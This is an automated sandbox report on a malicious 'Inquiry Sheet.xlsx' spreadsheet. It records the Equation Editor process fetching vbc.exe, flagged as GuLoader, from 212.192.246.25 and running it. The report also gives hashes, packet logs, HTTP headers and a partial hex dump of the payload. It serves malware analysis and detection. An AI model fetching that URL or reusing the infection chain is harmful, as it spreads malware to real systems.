                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF0B7.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                  Category:dropped
                  Size (bytes):1254
                  Entropy (8bit):5.835900066445133
                  Encrypted:false
                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                  MD5:A3C62E516777C15BF216F12143693C61
                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                  Malicious:false
                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                  C:\Users\user\Desktop\~$Inquiry Sheet.xlsx
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):330
                  Entropy (8bit):1.4377382811115937
                  Encrypted:false
                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                  Malicious:true
                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  C:\Users\Public\vbc.exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):139264
                  Entropy (8bit):6.609176626733107
                  Encrypted:false
                  SSDEEP:1536:T8hQbCg3d/xOfo6dUoEiL7yQMLIn6Otq/CrAvI7S6mStD2arf6FRo6DomgJ:DGAZ6dNEc/MLo6Ot57S69D2aD6F5oj
                  MD5:B7E5ACDADE5630DBF1AB4B211DDC16DB
                  SHA1:EF39B9D9B31F61A538C79D06171B2F3FB62D3346
                  SHA-256:F16CD8C15E34505A4C72C77DF972264F67E97C2E0B79B205F82BB59F26C09998
                  SHA-512:61FA3478A69E18BF8024E656AB3C7334B96C94BA8A64E672596D77FE84F5E247508E13331DBE10D20488EDAEA7E0D976D8E5C1B27820AB4091F063E7833E05B9
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 18%
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6..W..W..W..K..W..u..W..q..W.Rich.W.........................PE..L.....kH..........................................@..........................`......\b..........................................(.... ..:;..................................................................8... ....................................text............................... ..`.data...XE..........................@....rsrc...:;... ...@..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................

                  Static File Info

                  General

                  File type:CDFV2 Encrypted
                  Entropy (8bit):7.988006994673915
                  TrID:
                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                  File name:Inquiry Sheet.xlsx
                  File size:601480
                  MD5:b079763f132db9b4d979256a28909892
                  SHA1:3f8ef9821671cbc8267baa2c6e9a41a18af45f78
                  SHA256:71db7caab688d41a1c6bca4cafbf782d50a670a7c7e73ad3000dea754959cf2e
                  SHA512:cbe0ed7d4eefa62822efa8eaa389197d69a256e7966017f0edb92abd26ae0062f2113fecffa2b726d2e291907d144e8c9c93370c47be734c9a16015cfb08efb4
                  SSDEEP:12288:2nCwXTD6QrBSx+wiiHmFi1KTBOh0jOTFn6RoSFuSc:2rDZdrwHmFikFO/h6Royc
                  File Content Preview:........................>.......................................................................................z..............................................................................................................................................

                  File Icon

                  Icon Hash:e4e2aa8aa4b4bcb4

                  Network Behavior

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Sep 13, 2021 20:16:54.802037954 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:54.832849979 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:54.833056927 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:54.834225893 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:54.899867058 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:54.950155973 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:54.950234890 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:54.950273991 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:54.950309992 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:54.950387955 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:54.950689077 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:54.980690956 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:54.980767012 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:54.980792046 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:54.980812073 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:54.980850935 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:54.980890036 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:54.980910063 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:54.980923891 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:54.980959892 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:54.980995893 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:54.981008053 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:54.981044054 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:54.981065989 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:54.981086016 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:54.981107950 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.019262075 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.019306898 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.019337893 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.019365072 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.019382000 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.019402027 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.019422054 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.019459963 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.019467115 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.019493103 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.019509077 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.019546032 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.019551992 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.019578934 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.019592047 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.019619942 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.019629002 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.019654989 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.019668102 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.019699097 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.019705057 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.019726992 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.019740105 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.019763947 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.019774914 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.019800901 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.019812107 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.019838095 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.019853115 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.019879103 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.022079945 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.048996925 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049079895 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049108982 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.049122095 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.049158096 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049197912 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049220085 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.049233913 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.049259901 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049293041 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.049309969 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049343109 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.049379110 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049413919 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049438000 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.049444914 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.049468994 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049504042 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.049519062 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049551010 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.049571037 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049603939 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.049618959 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049652100 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.049666882 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049698114 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.049715996 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049753904 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.049766064 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049798965 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.049818993 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049851894 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.049870968 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049904108 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.049920082 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049952030 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.049968004 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.049998999 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.050017118 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.050049067 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.050065041 CEST8049165212.192.246.25192.168.2.22
                  Sep 13, 2021 20:16:55.050092936 CEST4916580192.168.2.22212.192.246.25
                  Sep 13, 2021 20:16:55.050108910 CEST8049165212.192.246.25192.168.2.22

                  HTTP Request Dependency Graph

                  • 212.192.246.25

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.2249165212.192.246.2580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  TimestampkBytes transferredDirectionData
                  Sep 13, 2021 20:16:54.834225893 CEST0OUTGET /excel/vbc.exe HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: 212.192.246.25
                  Connection: Keep-Alive
                  Sep 13, 2021 20:16:54.950155973 CEST1INHTTP/1.1 200 OK
                  Date: Mon, 13 Sep 2021 18:16:54 GMT
                  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
                  Last-Modified: Sun, 12 Sep 2021 22:03:18 GMT
                  ETag: "22000-5cbd38416fb31"
                  Accept-Ranges: bytes
                  Content-Length: 139264
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/x-msdownload
                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 36 a4 c9 93 57 ca 9a 93 57 ca 9a 93 57 ca 9a 10 4b c4 9a 92 57 ca 9a dc 75 c3 9a 9a 57 ca 9a a5 71 c7 9a 92 57 ca 9a 52 69 63 68 93 57 ca 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 98 6b 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 c0 01 00 00 90 00 00 00 00 00 00 bc 14 00 00 00 10 00 00 00 d0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 60 02 00 00 10 00 00 5c 62 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c8 01 00 28 00 00 00 00 20 02 00 3a 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 bd 01 00 00 10 00 00 00 c0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 58 45 00 00 00 d0 01 00 00 10 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 3a 3b 00 00 00 20 02 00 00 40 00 00 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6WWWKWuWqWRichWPELkH@`\b( :;8 .text `.dataXE@.rsrc:; @@@IMSVBVM60.DLL


                  Code Manipulations

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:20:16:19
                  Start date:13/09/2021
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase:0x13fd80000
                  File size:28253536 bytes
                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:20:16:41
                  Start date:13/09/2021
                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit):true
                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Imagebase:0x400000
                  File size:543304 bytes
                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:20:16:42
                  Start date:13/09/2021
                  Path:C:\Users\Public\vbc.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\Public\vbc.exe'
                  Imagebase:0x400000
                  File size:139264 bytes
                  MD5 hash:B7E5ACDADE5630DBF1AB4B211DDC16DB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 18%, ReversingLabs
                  Reputation:low

                  Disassembly

                  Code Analysis

                  Reset < >